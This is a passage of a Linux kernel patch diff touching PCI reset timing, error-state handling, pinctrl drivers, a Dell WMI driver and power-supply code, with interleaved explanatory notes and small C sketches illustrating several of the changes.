+ 	 * Conventional PCI and PCI-X we need to wait Tpvrh + Trhfa before
+-	 * accessing the device after reset (that is 1000 ms + 100 ms). In
+-	 * practice this should not be needed because we don't do power
+-	 * management for them (see pci_bridge_d3_possible()).
++	 * accessing the device after reset (that is 1000 ms + 100 ms).
+ 	 */
+ 	if (!pci_is_pcie(dev)) {
+ 		pci_dbg(dev, "waiting %d ms for secondary bus\n", 1000 + delay);
+ 		msleep(1000 + delay);
+-		return;
++		return 0;
+ 	}
+ 
+ 	/*
+@@ -5010,11 +5012,11 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 	 * configuration requests if we only wait for 100 ms (see
+ 	 * https://bugzilla.kernel.org/show_bug.cgi?id=203885).
+ 	 *
+-	 * Therefore we wait for 100 ms and check for the device presence.
+-	 * If it is still not present give it an additional 100 ms.
++	 * Therefore we wait for 100 ms and check for the device presence
++	 * until the timeout expires.
+ 	 */
+ 	if (!pcie_downstream_port(dev))
+-		return;
++		return 0;
+ 
+ 	if (pcie_get_speed_cap(dev) <= PCIE_SPEED_5_0GT) {
+ 		pci_dbg(dev, "waiting %d ms for downstream link\n", delay);
+@@ -5025,14 +5027,11 @@ void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev)
+ 		if (!pcie_wait_for_link_delay(dev, true, delay)) {
+ 			/* Did not train, no need to wait any further */
+ 			pci_info(dev, "Data Link Layer Link Active not set in 1000 msec\n");
+-			return;
++			return -ENOTTY;
+ 		}
+ 	}
+ 
+-	if (!pci_device_is_present(child)) {
+-		pci_dbg(child, "waiting additional %d ms to become accessible\n", delay);
+-		msleep(delay);
+-	}
++	return pci_dev_wait(child, reset_type, timeout - delay);
+ }
+ 
+ void pci_reset_secondary_bus(struct pci_dev *dev)
+@@ -5051,15 +5050,6 @@ void pci_reset_secondary_bus(struct pci_dev *dev)
+ 
+ 	ctrl &= ~PCI_BRIDGE_CTL_BUS_RESET;
+ 	pci_write_config_word(dev, PCI_BRIDGE_CONTROL, ctrl);
+-
+-	/*
+-	 * Trhfa for conventional PCI is 2^25 clock cycles.
+-	 * Assuming a minimum 33MHz clock this results in a 1s
+-	 * delay before we can consider subordinate devices to
+-	 * be re-initialized.  PCIe has some ways to shorten this,
+-	 * but we don't make use of them yet.
+-	 */
+-	ssleep(1);
+ }
+ 
+ void __weak pcibios_reset_secondary_bus(struct pci_dev *dev)
+@@ -5078,7 +5068,8 @@ int pci_bridge_secondary_bus_reset(struct pci_dev *dev)
+ {
+ 	pcibios_reset_secondary_bus(dev);
+ 
+-	return pci_dev_wait(dev, "bus reset", PCIE_RESET_READY_POLL_MS);
++	return pci_bridge_wait_for_secondary_bus(dev, "bus reset",
++						 PCIE_RESET_READY_POLL_MS);
+ }
+ EXPORT_SYMBOL_GPL(pci_bridge_secondary_bus_reset);
+ 
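
[Note: pci_bridge_secondary_bus_reset() now delegates the post-reset wait to pci_bridge_wait_for_secondary_bus(), which sleeps "delay" ms before polling and therefore hands pci_dev_wait() only the remaining budget (timeout - delay). A toy model of that budget accounting, with milliseconds as plain ints.]

#include <stdio.h>

#define PCIE_RESET_READY_POLL_MS 60000

static int dev_wait(int budget_ms)	/* pci_dev_wait() analog */
{
	printf("polling device for up to %d ms\n", budget_ms);
	return 0;
}

static int wait_for_secondary_bus(int timeout_ms)
{
	int delay_ms = 100;	/* d3cold delay, spent before polling */

	/* msleep(delay_ms) would happen here */
	return dev_wait(timeout_ms - delay_ms);
}

int main(void)
{
	return wait_for_secondary_bus(PCIE_RESET_READY_POLL_MS);
}
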
+diff --git a/drivers/pci/pci.h b/drivers/pci/pci.h
+index 9049d07d3aaec..d2c08670a20ed 100644
+--- a/drivers/pci/pci.h
++++ b/drivers/pci/pci.h
+@@ -64,6 +64,19 @@ struct pci_cap_saved_state *pci_find_saved_ext_cap(struct pci_dev *dev,
+ #define PCI_PM_D3HOT_WAIT       10	/* msec */
+ #define PCI_PM_D3COLD_WAIT      100	/* msec */
+ 
++/*
++ * Following exit from Conventional Reset, devices must be ready within 1 sec
++ * (PCIe r6.0 sec 6.6.1).  A D3cold to D0 transition implies a Conventional
++ * Reset (PCIe r6.0 sec 5.8).
++ */
++#define PCI_RESET_WAIT		1000	/* msec */
++/*
++ * Devices may extend the 1 sec period through Request Retry Status completions
++ * (PCIe r6.0 sec 2.3.1).  The spec does not provide an upper limit, but 60 sec
++ * ought to be enough for any device to become responsive.
++ */
++#define PCIE_RESET_READY_POLL_MS 60000	/* msec */
++
+ void pci_update_current_state(struct pci_dev *dev, pci_power_t state);
+ void pci_refresh_power_state(struct pci_dev *dev);
+ int pci_power_up(struct pci_dev *dev);
+@@ -86,8 +99,9 @@ void pci_msi_init(struct pci_dev *dev);
+ void pci_msix_init(struct pci_dev *dev);
+ bool pci_bridge_d3_possible(struct pci_dev *dev);
+ void pci_bridge_d3_update(struct pci_dev *dev);
+-void pci_bridge_wait_for_secondary_bus(struct pci_dev *dev);
+ void pci_bridge_reconfigure_ltr(struct pci_dev *dev);
++int pci_bridge_wait_for_secondary_bus(struct pci_dev *dev, char *reset_type,
++				      int timeout);
+ 
+ static inline void pci_wakeup_event(struct pci_dev *dev)
+ {
+@@ -310,53 +324,36 @@ struct pci_sriov {
+  * @dev: PCI device to set new error_state
+  * @new: the state we want dev to be in
+  *
+- * Must be called with device_lock held.
++ * If the device is experiencing perm_failure, it has to remain in that state.
++ * Any other transition is allowed.
+  *
+  * Returns true if state has been changed to the requested state.
+  */
+ static inline bool pci_dev_set_io_state(struct pci_dev *dev,
+ 					pci_channel_state_t new)
+ {
+-	bool changed = false;
++	pci_channel_state_t old;
+ 
+-	device_lock_assert(&dev->dev);
+ 	switch (new) {
+ 	case pci_channel_io_perm_failure:
+-		switch (dev->error_state) {
+-		case pci_channel_io_frozen:
+-		case pci_channel_io_normal:
+-		case pci_channel_io_perm_failure:
+-			changed = true;
+-			break;
+-		}
+-		break;
++		xchg(&dev->error_state, pci_channel_io_perm_failure);
++		return true;
+ 	case pci_channel_io_frozen:
+-		switch (dev->error_state) {
+-		case pci_channel_io_frozen:
+-		case pci_channel_io_normal:
+-			changed = true;
+-			break;
+-		}
+-		break;
++		old = cmpxchg(&dev->error_state, pci_channel_io_normal,
++			      pci_channel_io_frozen);
++		return old != pci_channel_io_perm_failure;
+ 	case pci_channel_io_normal:
+-		switch (dev->error_state) {
+-		case pci_channel_io_frozen:
+-		case pci_channel_io_normal:
+-			changed = true;
+-			break;
+-		}
+-		break;
++		old = cmpxchg(&dev->error_state, pci_channel_io_frozen,
++			      pci_channel_io_normal);
++		return old != pci_channel_io_perm_failure;
++	default:
++		return false;
+ 	}
+-	if (changed)
+-		dev->error_state = new;
+-	return changed;
+ }
+ 
+ static inline int pci_dev_set_disconnected(struct pci_dev *dev, void *unused)
+ {
+-	device_lock(&dev->dev);
+ 	pci_dev_set_io_state(dev, pci_channel_io_perm_failure);
+-	device_unlock(&dev->dev);
+ 
+ 	return 0;
+ }
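
[Note: the rewritten pci_dev_set_io_state() drops the device lock and encodes the state machine in atomic operations: perm_failure is terminal (unconditional exchange), and the frozen/normal transitions use compare-and-swap so a racing perm_failure can never be overwritten. A userspace sketch with GCC atomic builtins.]

#include <stdio.h>

enum io_state { NORMAL, FROZEN, PERM_FAILURE };

static int state = NORMAL;

static int set_state(enum io_state new)
{
	int expect;

	switch (new) {
	case PERM_FAILURE:
		__atomic_exchange_n(&state, PERM_FAILURE, __ATOMIC_SEQ_CST);
		return 1;			/* always allowed */
	case FROZEN:
		expect = NORMAL;
		__atomic_compare_exchange_n(&state, &expect, FROZEN, 0,
					    __ATOMIC_SEQ_CST, __ATOMIC_SEQ_CST);
		/* on failure, expect holds the prior value (cmpxchg's return) */
		return expect != PERM_FAILURE;	/* the terminal state sticks */
	case NORMAL:
		expect = FROZEN;
		__atomic_compare_exchange_n(&state, &expect, NORMAL, 0,
					    __ATOMIC_SEQ_CST, __ATOMIC_SEQ_CST);
		return expect != PERM_FAILURE;
	}
	return 0;
}

int main(void)
{
	set_state(FROZEN);
	set_state(PERM_FAILURE);
	printf("frozen again allowed? %d\n", set_state(FROZEN));	/* 0 */
	return 0;
}
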
+diff --git a/drivers/pci/pcie/dpc.c b/drivers/pci/pcie/dpc.c
+index f5ffea17c7f87..a5d7c69b764e0 100644
+--- a/drivers/pci/pcie/dpc.c
++++ b/drivers/pci/pcie/dpc.c
+@@ -170,8 +170,8 @@ pci_ers_result_t dpc_reset_link(struct pci_dev *pdev)
+ 	pci_write_config_word(pdev, cap + PCI_EXP_DPC_STATUS,
+ 			      PCI_EXP_DPC_STATUS_TRIGGER);
+ 
+-	if (!pcie_wait_for_link(pdev, true)) {
+-		pci_info(pdev, "Data Link Layer Link Active not set in 1000 msec\n");
++	if (pci_bridge_wait_for_secondary_bus(pdev, "DPC",
++					      PCIE_RESET_READY_POLL_MS)) {
+ 		clear_bit(PCI_DPC_RECOVERED, &pdev->priv_flags);
+ 		ret = PCI_ERS_RESULT_DISCONNECT;
+ 	} else {
+diff --git a/drivers/pci/probe.c b/drivers/pci/probe.c
+index 1779582fb5007..5988584825482 100644
+--- a/drivers/pci/probe.c
++++ b/drivers/pci/probe.c
+@@ -996,7 +996,7 @@ static int pci_register_host_bridge(struct pci_host_bridge *bridge)
+ 	resource_list_for_each_entry_safe(window, n, &resources) {
+ 		offset = window->offset;
+ 		res = window->res;
+-		if (!res->end)
++		if (!res->flags && !res->start && !res->end)
+ 			continue;
+ 
+ 		list_move_tail(&window->node, &bridge->windows);
+diff --git a/drivers/pci/quirks.c b/drivers/pci/quirks.c
+index 285acc4aaccc1..20ac67d590348 100644
+--- a/drivers/pci/quirks.c
++++ b/drivers/pci/quirks.c
+@@ -5340,6 +5340,7 @@ static void quirk_no_flr(struct pci_dev *dev)
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x1487, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x148c, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x149c, quirk_no_flr);
++DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_AMD, 0x7901, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_INTEL, 0x1502, quirk_no_flr);
+ DECLARE_PCI_FIXUP_EARLY(PCI_VENDOR_ID_INTEL, 0x1503, quirk_no_flr);
+ 
+diff --git a/drivers/pci/switch/switchtec.c b/drivers/pci/switch/switchtec.c
+index 75be4fe225090..0c1faa6c1973a 100644
+--- a/drivers/pci/switch/switchtec.c
++++ b/drivers/pci/switch/switchtec.c
+@@ -606,21 +606,20 @@ static ssize_t switchtec_dev_read(struct file *filp, char __user *data,
+ 	rc = copy_to_user(data, &stuser->return_code,
+ 			  sizeof(stuser->return_code));
+ 	if (rc) {
+-		rc = -EFAULT;
+-		goto out;
++		mutex_unlock(&stdev->mrpc_mutex);
++		return -EFAULT;
+ 	}
+ 
+ 	data += sizeof(stuser->return_code);
+ 	rc = copy_to_user(data, &stuser->data,
+ 			  size - sizeof(stuser->return_code));
+ 	if (rc) {
+-		rc = -EFAULT;
+-		goto out;
++		mutex_unlock(&stdev->mrpc_mutex);
++		return -EFAULT;
+ 	}
+ 
+ 	stuser_set_state(stuser, MRPC_IDLE);
+ 
+-out:
+ 	mutex_unlock(&stdev->mrpc_mutex);
+ 
+ 	if (stuser->status == SWITCHTEC_MRPC_STATUS_DONE ||
+diff --git a/drivers/phy/mediatek/phy-mtk-io.h b/drivers/phy/mediatek/phy-mtk-io.h
+index d20ad5e5be814..58f06db822cb0 100644
+--- a/drivers/phy/mediatek/phy-mtk-io.h
++++ b/drivers/phy/mediatek/phy-mtk-io.h
+@@ -39,8 +39,8 @@ static inline void mtk_phy_update_bits(void __iomem *reg, u32 mask, u32 val)
+ /* field @mask shall be constant and continuous */
+ #define mtk_phy_update_field(reg, mask, val) \
+ ({ \
+-	typeof(mask) mask_ = (mask);	\
+-	mtk_phy_update_bits(reg, mask_, FIELD_PREP(mask_, val)); \
++	BUILD_BUG_ON_MSG(!__builtin_constant_p(mask), "mask is not constant"); \
++	mtk_phy_update_bits(reg, mask, FIELD_PREP(mask, val)); \
+ })
+ 
+ #endif
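
[Note: FIELD_PREP() derives the shift from the mask at compile time, so the mask must be a compile-time constant; stashing it in the local "mask_" hid that from the compiler, and the rewritten macro makes the requirement explicit with BUILD_BUG_ON_MSG. A standalone illustration of the shift-from-mask trick, simplified and without the kernel's static type checks.]

#include <stdio.h>

/* Simplified FIELD_PREP: shift amount = number of trailing zero bits
 * in the (constant) mask. */
#define FIELD_PREP(mask, val) \
	(((unsigned int)(val) << __builtin_ctz(mask)) & (mask))

#define SPEED_MASK 0x00f0u	/* bits 7:4 */

int main(void)
{
	unsigned int reg = 0;

	reg |= FIELD_PREP(SPEED_MASK, 5);	/* -> 0x50 */
	printf("reg=0x%x\n", reg);
	return 0;
}
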
+diff --git a/drivers/phy/rockchip/phy-rockchip-typec.c b/drivers/phy/rockchip/phy-rockchip-typec.c
+index d76440ae10ff4..6aea512e5d4ee 100644
+--- a/drivers/phy/rockchip/phy-rockchip-typec.c
++++ b/drivers/phy/rockchip/phy-rockchip-typec.c
+@@ -821,10 +821,10 @@ static int tcphy_get_mode(struct rockchip_typec_phy *tcphy)
+ 	mode = MODE_DFP_USB;
+ 	id = EXTCON_USB_HOST;
+ 
+-	if (ufp) {
++	if (ufp > 0) {
+ 		mode = MODE_UFP_USB;
+ 		id = EXTCON_USB;
+-	} else if (dp) {
++	} else if (dp > 0) {
+ 		mode = MODE_DFP_DP;
+ 		id = EXTCON_DISP_DP;
+ 
+diff --git a/drivers/pinctrl/bcm/pinctrl-bcm2835.c b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+index 7857e612a1008..c7cdccdb4332a 100644
+--- a/drivers/pinctrl/bcm/pinctrl-bcm2835.c
++++ b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+@@ -363,8 +363,6 @@ static int bcm2835_of_gpio_ranges_fallback(struct gpio_chip *gc,
+ {
+ 	struct pinctrl_dev *pctldev = of_pinctrl_get(np);
+ 
+-	of_node_put(np);
+-
+ 	if (!pctldev)
+ 		return 0;
+ 
+diff --git a/drivers/pinctrl/mediatek/pinctrl-paris.c b/drivers/pinctrl/mediatek/pinctrl-paris.c
+index 475f4172d5085..37761a8e7a18f 100644
+--- a/drivers/pinctrl/mediatek/pinctrl-paris.c
++++ b/drivers/pinctrl/mediatek/pinctrl-paris.c
+@@ -640,7 +640,7 @@ static int mtk_hw_get_value_wrap(struct mtk_pinctrl *hw, unsigned int gpio, int
+ ssize_t mtk_pctrl_show_one_pin(struct mtk_pinctrl *hw,
+ 	unsigned int gpio, char *buf, unsigned int buf_len)
+ {
+-	int pinmux, pullup, pullen, len = 0, r1 = -1, r0 = -1, rsel = -1;
++	int pinmux, pullup = 0, pullen = 0, len = 0, r1 = -1, r0 = -1, rsel = -1;
+ 	const struct mtk_pin_desc *desc;
+ 	u32 try_all_type = 0;
+ 
+@@ -717,7 +717,7 @@ static void mtk_pctrl_dbg_show(struct pinctrl_dev *pctldev, struct seq_file *s,
+ 			  unsigned int gpio)
+ {
+ 	struct mtk_pinctrl *hw = pinctrl_dev_get_drvdata(pctldev);
+-	char buf[PIN_DBG_BUF_SZ];
++	char buf[PIN_DBG_BUF_SZ] = { 0 };
+ 
+ 	(void)mtk_pctrl_show_one_pin(hw, gpio, buf, PIN_DBG_BUF_SZ);
+ 
+diff --git a/drivers/pinctrl/pinctrl-at91-pio4.c b/drivers/pinctrl/pinctrl-at91-pio4.c
+index 39b233f73e132..373eed8bc4be9 100644
+--- a/drivers/pinctrl/pinctrl-at91-pio4.c
++++ b/drivers/pinctrl/pinctrl-at91-pio4.c
+@@ -1149,8 +1149,8 @@ static int atmel_pinctrl_probe(struct platform_device *pdev)
+ 
+ 		pin_desc[i].number = i;
+ 		/* Pin naming convention: P(bank_name)(bank_pin_number). */
+-		pin_desc[i].name = kasprintf(GFP_KERNEL, "P%c%d",
+-					     bank + 'A', line);
++		pin_desc[i].name = devm_kasprintf(&pdev->dev, GFP_KERNEL, "P%c%d",
++						  bank + 'A', line);
+ 
+ 		group->name = group_names[i] = pin_desc[i].name;
+ 		group->pin = pin_desc[i].number;
+diff --git a/drivers/pinctrl/pinctrl-at91.c b/drivers/pinctrl/pinctrl-at91.c
+index 1e1813d7c5508..c405296e49896 100644
+--- a/drivers/pinctrl/pinctrl-at91.c
++++ b/drivers/pinctrl/pinctrl-at91.c
+@@ -1885,7 +1885,7 @@ static int at91_gpio_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	for (i = 0; i < chip->ngpio; i++)
+-		names[i] = kasprintf(GFP_KERNEL, "pio%c%d", alias_idx + 'A', i);
++		names[i] = devm_kasprintf(&pdev->dev, GFP_KERNEL, "pio%c%d", alias_idx + 'A', i);
+ 
+ 	chip->names = (const char *const *)names;
+ 
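
[Note: both AT91 hunks switch kasprintf() to devm_kasprintf() so the generated pin names are tied to the device's lifetime and freed automatically on unbind, closing a leak on probe failure. A toy devres sketch; devm_asprintf() and the fixed 32-byte strings are inventions for illustration.]

#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>

#define MAX_RES 64

static void *res[MAX_RES];
static int nres;

static char *devm_asprintf(const char *fmt, ...)
{
	va_list ap;
	char *s;

	if (nres == MAX_RES)
		return NULL;
	s = malloc(32);
	if (!s)
		return NULL;
	va_start(ap, fmt);
	vsnprintf(s, 32, fmt, ap);
	va_end(ap);
	res[nres++] = s;	/* record against the "device" */
	return s;
}

static void device_unbind(void)
{
	while (nres)
		free(res[--nres]);	/* driver frees nothing by hand */
}

int main(void)
{
	char *name = devm_asprintf("pio%c%d", 'A', 3);

	if (name)
		printf("%s\n", name);
	device_unbind();
	return 0;
}
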
+diff --git a/drivers/pinctrl/pinctrl-rockchip.c b/drivers/pinctrl/pinctrl-rockchip.c
+index 5eeac92f610a0..0276b52f37168 100644
+--- a/drivers/pinctrl/pinctrl-rockchip.c
++++ b/drivers/pinctrl/pinctrl-rockchip.c
+@@ -3045,6 +3045,7 @@ static int rockchip_pinctrl_parse_groups(struct device_node *np,
+ 		np_config = of_find_node_by_phandle(be32_to_cpup(phandle));
+ 		ret = pinconf_generic_parse_dt_config(np_config, NULL,
+ 				&grp->data[j].configs, &grp->data[j].nconfigs);
++		of_node_put(np_config);
+ 		if (ret)
+ 			return ret;
+ 	}
+diff --git a/drivers/pinctrl/qcom/pinctrl-msm8976.c b/drivers/pinctrl/qcom/pinctrl-msm8976.c
+index ec43edf9b660a..e11d845847190 100644
+--- a/drivers/pinctrl/qcom/pinctrl-msm8976.c
++++ b/drivers/pinctrl/qcom/pinctrl-msm8976.c
+@@ -733,7 +733,7 @@ static const char * const codec_int2_groups[] = {
+ 	"gpio74",
+ };
+ static const char * const wcss_bt_groups[] = {
+-	"gpio39", "gpio47", "gpio88",
++	"gpio39", "gpio47", "gpio48",
+ };
+ static const char * const sdc3_groups[] = {
+ 	"gpio39", "gpio40", "gpio41",
+@@ -958,9 +958,9 @@ static const struct msm_pingroup msm8976_groups[] = {
+ 	PINGROUP(37, NA, NA, NA, qdss_tracedata_b, NA, NA, NA, NA, NA),
+ 	PINGROUP(38, NA, NA, NA, NA, NA, NA, NA, qdss_tracedata_b, NA),
+ 	PINGROUP(39, wcss_bt, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+-	PINGROUP(40, wcss_wlan, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+-	PINGROUP(41, wcss_wlan, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+-	PINGROUP(42, wcss_wlan, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
++	PINGROUP(40, wcss_wlan2, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
++	PINGROUP(41, wcss_wlan1, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
++	PINGROUP(42, wcss_wlan0, sdc3, NA, qdss_tracedata_a, NA, NA, NA, NA, NA),
+ 	PINGROUP(43, wcss_wlan, sdc3, NA, NA, qdss_tracedata_a, NA, NA, NA, NA),
+ 	PINGROUP(44, wcss_wlan, sdc3, NA, NA, NA, NA, NA, NA, NA),
+ 	PINGROUP(45, wcss_fm, NA, qdss_tracectl_a, NA, NA, NA, NA, NA, NA),
+diff --git a/drivers/pinctrl/renesas/pinctrl-rzg2l.c b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+index 5aa3836dbc226..6f762097557af 100644
+--- a/drivers/pinctrl/renesas/pinctrl-rzg2l.c
++++ b/drivers/pinctrl/renesas/pinctrl-rzg2l.c
+@@ -130,6 +130,7 @@ struct rzg2l_dedicated_configs {
+ struct rzg2l_pinctrl_data {
+ 	const char * const *port_pins;
+ 	const u32 *port_pin_configs;
++	unsigned int n_ports;
+ 	struct rzg2l_dedicated_configs *dedicated_pins;
+ 	unsigned int n_port_pins;
+ 	unsigned int n_dedicated_pins;
+@@ -1124,7 +1125,7 @@ static struct {
+ 	}
+ };
+ 
+-static int rzg2l_gpio_get_gpioint(unsigned int virq)
++static int rzg2l_gpio_get_gpioint(unsigned int virq, const struct rzg2l_pinctrl_data *data)
+ {
+ 	unsigned int gpioint;
+ 	unsigned int i;
+@@ -1133,13 +1134,13 @@ static int rzg2l_gpio_get_gpioint(unsigned int virq)
+ 	port = virq / 8;
+ 	bit = virq % 8;
+ 
+-	if (port >= ARRAY_SIZE(rzg2l_gpio_configs) ||
+-	    bit >= RZG2L_GPIO_PORT_GET_PINCNT(rzg2l_gpio_configs[port]))
++	if (port >= data->n_ports ||
++	    bit >= RZG2L_GPIO_PORT_GET_PINCNT(data->port_pin_configs[port]))
+ 		return -EINVAL;
+ 
+ 	gpioint = bit;
+ 	for (i = 0; i < port; i++)
+-		gpioint += RZG2L_GPIO_PORT_GET_PINCNT(rzg2l_gpio_configs[i]);
++		gpioint += RZG2L_GPIO_PORT_GET_PINCNT(data->port_pin_configs[i]);
+ 
+ 	return gpioint;
+ }
+@@ -1239,7 +1240,7 @@ static int rzg2l_gpio_child_to_parent_hwirq(struct gpio_chip *gc,
+ 	unsigned long flags;
+ 	int gpioint, irq;
+ 
+-	gpioint = rzg2l_gpio_get_gpioint(child);
++	gpioint = rzg2l_gpio_get_gpioint(child, pctrl->data);
+ 	if (gpioint < 0)
+ 		return gpioint;
+ 
+@@ -1313,8 +1314,8 @@ static void rzg2l_init_irq_valid_mask(struct gpio_chip *gc,
+ 		port = offset / 8;
+ 		bit = offset % 8;
+ 
+-		if (port >= ARRAY_SIZE(rzg2l_gpio_configs) ||
+-		    bit >= RZG2L_GPIO_PORT_GET_PINCNT(rzg2l_gpio_configs[port]))
++		if (port >= pctrl->data->n_ports ||
++		    bit >= RZG2L_GPIO_PORT_GET_PINCNT(pctrl->data->port_pin_configs[port]))
+ 			clear_bit(offset, valid_mask);
+ 	}
+ }
+@@ -1519,6 +1520,7 @@ static int rzg2l_pinctrl_probe(struct platform_device *pdev)
+ static struct rzg2l_pinctrl_data r9a07g043_data = {
+ 	.port_pins = rzg2l_gpio_names,
+ 	.port_pin_configs = r9a07g043_gpio_configs,
++	.n_ports = ARRAY_SIZE(r9a07g043_gpio_configs),
+ 	.dedicated_pins = rzg2l_dedicated_pins.common,
+ 	.n_port_pins = ARRAY_SIZE(r9a07g043_gpio_configs) * RZG2L_PINS_PER_PORT,
+ 	.n_dedicated_pins = ARRAY_SIZE(rzg2l_dedicated_pins.common),
+@@ -1527,6 +1529,7 @@ static struct rzg2l_pinctrl_data r9a07g043_data = {
+ static struct rzg2l_pinctrl_data r9a07g044_data = {
+ 	.port_pins = rzg2l_gpio_names,
+ 	.port_pin_configs = rzg2l_gpio_configs,
++	.n_ports = ARRAY_SIZE(rzg2l_gpio_configs),
+ 	.dedicated_pins = rzg2l_dedicated_pins.common,
+ 	.n_port_pins = ARRAY_SIZE(rzg2l_gpio_names),
+ 	.n_dedicated_pins = ARRAY_SIZE(rzg2l_dedicated_pins.common) +
+diff --git a/drivers/pinctrl/stm32/pinctrl-stm32.c b/drivers/pinctrl/stm32/pinctrl-stm32.c
+index 1cddca506ad7e..cb33a23ab0c11 100644
+--- a/drivers/pinctrl/stm32/pinctrl-stm32.c
++++ b/drivers/pinctrl/stm32/pinctrl-stm32.c
+@@ -1382,6 +1382,7 @@ static struct irq_domain *stm32_pctrl_get_irq_domain(struct platform_device *pde
+ 		return ERR_PTR(-ENXIO);
+ 
+ 	domain = irq_find_host(parent);
++	of_node_put(parent);
+ 	if (!domain)
+ 		/* domain not registered yet */
+ 		return ERR_PTR(-EPROBE_DEFER);
+diff --git a/drivers/platform/chrome/cros_ec_typec.c b/drivers/platform/chrome/cros_ec_typec.c
+index 001b0de95a46e..d1714b5d085be 100644
+--- a/drivers/platform/chrome/cros_ec_typec.c
++++ b/drivers/platform/chrome/cros_ec_typec.c
+@@ -27,7 +27,7 @@
+ #define DRV_NAME "cros-ec-typec"
+ 
+ #define DP_PORT_VDO	(DP_CONF_SET_PIN_ASSIGN(BIT(DP_PIN_ASSIGN_C) | BIT(DP_PIN_ASSIGN_D)) | \
+-				DP_CAP_DFP_D)
++				DP_CAP_DFP_D | DP_CAP_RECEPTACLE)
+ 
+ /* Supported alt modes. */
+ enum {
+diff --git a/drivers/platform/x86/dell/dell-wmi-ddv.c b/drivers/platform/x86/dell/dell-wmi-ddv.c
+index 2bb449845d143..9cb6ae42dbdc8 100644
+--- a/drivers/platform/x86/dell/dell-wmi-ddv.c
++++ b/drivers/platform/x86/dell/dell-wmi-ddv.c
+@@ -26,7 +26,8 @@
+ 
+ #define DRIVER_NAME	"dell-wmi-ddv"
+ 
+-#define DELL_DDV_SUPPORTED_INTERFACE 2
++#define DELL_DDV_SUPPORTED_VERSION_MIN	2
++#define DELL_DDV_SUPPORTED_VERSION_MAX	3
+ #define DELL_DDV_GUID	"8A42EA14-4F2A-FD45-6422-0087F7A7E608"
+ 
+ #define DELL_EPPID_LENGTH	20
+@@ -49,6 +50,7 @@ enum dell_ddv_method {
+ 	DELL_DDV_BATTERY_RAW_ANALYTICS_START	= 0x0E,
+ 	DELL_DDV_BATTERY_RAW_ANALYTICS		= 0x0F,
+ 	DELL_DDV_BATTERY_DESIGN_VOLTAGE		= 0x10,
++	DELL_DDV_BATTERY_RAW_ANALYTICS_A_BLOCK	= 0x11, /* version 3 */
+ 
+ 	DELL_DDV_INTERFACE_VERSION		= 0x12,
+ 
+@@ -340,7 +342,7 @@ static int dell_wmi_ddv_probe(struct wmi_device *wdev, const void *context)
+ 		return ret;
+ 
+ 	dev_dbg(&wdev->dev, "WMI interface version: %d\n", version);
+-	if (version != DELL_DDV_SUPPORTED_INTERFACE)
++	if (version < DELL_DDV_SUPPORTED_VERSION_MIN || version > DELL_DDV_SUPPORTED_VERSION_MAX)
+ 		return -ENODEV;
+ 
+ 	data = devm_kzalloc(&wdev->dev, sizeof(*data), GFP_KERNEL);
+diff --git a/drivers/power/supply/power_supply_core.c b/drivers/power/supply/power_supply_core.c
+index 7c790c41e2fe3..cc5b2e22b42ac 100644
+--- a/drivers/power/supply/power_supply_core.c
++++ b/drivers/power/supply/power_supply_core.c
+@@ -1186,83 +1186,6 @@ static void psy_unregister_thermal(struct power_supply *psy)
+ 	thermal_zone_device_unregister(psy->tzd);
+ }
+ 
+-/* thermal cooling device callbacks */
+-static int ps_get_max_charge_cntl_limit(struct thermal_cooling_device *tcd,
+-					unsigned long *state)
+-{
+-	struct power_supply *psy;
+-	union power_supply_propval val;
+-	int ret;
+-
+-	psy = tcd->devdata;
+-	ret = power_supply_get_property(psy,
+-			POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT_MAX, &val);
+-	if (ret)
+-		return ret;
+-
+-	*state = val.intval;
+-
+-	return ret;
+-}
+-
+-static int ps_get_cur_charge_cntl_limit(struct thermal_cooling_device *tcd,
+-					unsigned long *state)
+-{
+-	struct power_supply *psy;
+-	union power_supply_propval val;
+-	int ret;
+-
+-	psy = tcd->devdata;
+-	ret = power_supply_get_property(psy,
+-			POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT, &val);
+-	if (ret)
+-		return ret;
+-
+-	*state = val.intval;
+-
+-	return ret;
+-}
+-
+-static int ps_set_cur_charge_cntl_limit(struct thermal_cooling_device *tcd,
+-					unsigned long state)
+-{
+-	struct power_supply *psy;
+-	union power_supply_propval val;
+-	int ret;
+-
+-	psy = tcd->devdata;
+-	val.intval = state;
+-	ret = psy->desc->set_property(psy,
+-		POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT, &val);
+-
+-	return ret;
+-}
+-
+-static const struct thermal_cooling_device_ops psy_tcd_ops = {
+-	.get_max_state = ps_get_max_charge_cntl_limit,
+-	.get_cur_state = ps_get_cur_charge_cntl_limit,
+-	.set_cur_state = ps_set_cur_charge_cntl_limit,
+-};
+-
+-static int psy_register_cooler(struct power_supply *psy)
+-{
+-	/* Register for cooling device if psy can control charging */
+-	if (psy_has_property(psy->desc, POWER_SUPPLY_PROP_CHARGE_CONTROL_LIMIT)) {
+-		psy->tcd = thermal_cooling_device_register(
+-			(char *)psy->desc->name,
+-			psy, &psy_tcd_ops);
+-		return PTR_ERR_OR_ZERO(psy->tcd);
+-	}
+-
+-	return 0;
+-}
+-
+-static void psy_unregister_cooler(struct power_supply *psy)
+-{
+-	if (IS_ERR_OR_NULL(psy->tcd))
+-		return;
+-	thermal_cooling_device_unregister(psy->tcd);
+-}
+ #else
+ static int psy_register_thermal(struct power_supply *psy)
+ {
